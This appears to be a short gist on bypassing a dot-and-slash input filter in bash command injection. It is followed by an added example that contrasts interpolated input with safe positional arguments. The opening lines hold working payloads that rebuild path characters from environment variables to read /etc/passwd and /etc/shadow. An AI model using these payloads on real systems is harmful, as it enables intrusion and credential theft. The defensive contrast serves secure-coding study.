@pastcompute
Last active April 7, 2024 11:22
How to access arbitrary file when you can't inject a dot or forward slash
bash -c '/path/to/some/binary args_not_attacker_controlled attacker_controlled$(cat<${HOME:0:1}etc${HOME:0:1}passwd)'

bash -c '/path/to/some/binary args_not_attacker_controlled attacker_controlled$(cat<${HOME:0:1}etc${HOME:0:1}apt${HOME:0:1}${LANGUAGE:5:1}${LANGUAGE:5:1}${HOME:0:1}shadow)'

Use the triple arrow (the <<< here-string) to redirect into bash if you can get an escaped space but not a direct space

bash -c '/bin/echo somestrangefile$(bash<<<"echo ABC")'

The following variant fails, because the escaped space is considered part of the 'word' by bash, which then tries to run a command called "echo ABC":

bash -c '/bin/echo somestrangefile$(bash<<<"echo\ ABC")'
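
Why the dot-and-slash filter from the title does not help, and what does: an added example (not part of the gist) that contrasts pasting the value into the bash -c string with passing it as a positional argument. The function names are hypothetical, and the sample payload is the harmless here-string from the snippet above.

```shell
#!/usr/bin/env bash
# Added example, not from the gist. All function names are hypothetical.

# The character filter described in the title: reject dots and forward slashes.
filter_ok() {
  case "$1" in
    *.*|*/*) return 1 ;;
    *)       return 0 ;;
  esac
}

# Vulnerable pattern: the value becomes part of the command string, so the
# inner bash parses it and performs command and parameter expansion on it.
run_interpolated() {
  bash -c "/bin/echo somestrangefile$1"
}

# Hardened pattern: the command string is a constant. The value arrives as
# the positional parameter $1 and is only expanded inside double quotes,
# so it is treated as data and never parsed as shell code.
run_as_argument() {
  bash -c '/bin/echo "somestrangefile$1"' _ "$1"
}

# Constructed sample input: the harmless here-string payload from the gist.
# It contains neither a dot nor a slash, so the filter accepts it.
payload='$(bash<<<"echo ABC")'

if filter_ok "$payload"; then
  printf 'filter:       accepted\n'
fi
printf 'interpolated: %s\n' "$(run_interpolated "$payload")"
printf 'as argument:  %s\n' "$(run_as_argument "$payload")"
```

The interpolated call prints the expanded result, while the argument form prints the payload text unchanged, which is the behaviour to require wherever external input reaches a `bash -c` invocation.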